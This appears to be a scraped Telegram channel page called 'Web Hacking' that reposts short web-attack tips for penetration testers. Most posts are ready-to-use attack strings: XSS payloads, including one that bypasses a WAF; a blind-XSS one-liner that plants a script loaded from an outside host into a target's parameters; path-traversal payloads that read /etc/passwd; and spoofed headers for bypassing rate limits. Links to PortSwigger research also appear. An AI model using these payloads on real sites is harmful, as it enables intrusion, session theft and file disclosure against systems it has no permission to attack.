Web Hacking – Telegram

Web Hacking

2.12K subscribers

52 photos

6 files

37 links

@OSCP_training
@pfsense
@WifiHacking

Download Telegram

About

Blog

Apps

Platform

2.12K subscribers

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

3.2K views20:52

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

10.3K views05:10

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

👍4👌1

10.4K views05:39

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

10.8K views20:29

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning

PortSwigger Research

Making HTTP header injection critical via response queue poisoning

HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a

👍2

3.03K views20:25

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack#:~:text=specialWordlists.py.-,Command%20line%20usage,-From%20time%20to

PortSwigger Research

Turbo Intruder: Embracing the billion-request attack

Automated web application attacks are terminally limited by the number of HTTP requests they can send. It's impossible to know how many hacks have gone off the rails because you didn't quite manage to

👍1

3.17K views19:34

👍1

3.23K views19:40

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Checklist; After Recon

👍5

3.17K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Rate Limit Bypass Headers

3.48K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters

3.57K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

IDOR Checklist !

4.11K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Testing Authentication Flaws in Web Application

👍1

4.29K views04:14

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Some filter bypass payload list while hunting for LFi vulnerability

→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd

👍3

4.07K views03:49

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

LFI Parameters

👍5

4.21K views18:23

Remote File Inclusion (RFI)

👍5

14K views09:00

Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP

❤‍🔥8👍1👌1🐳1

15.6K views04:10

5.52K views06:50

403 bypass techniques

👍5

18.3K views04:16

Bypassing Rate Limit Protection

👍5🤮1

20.7K views05:49

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

👍5🤮3

6.74K views21:51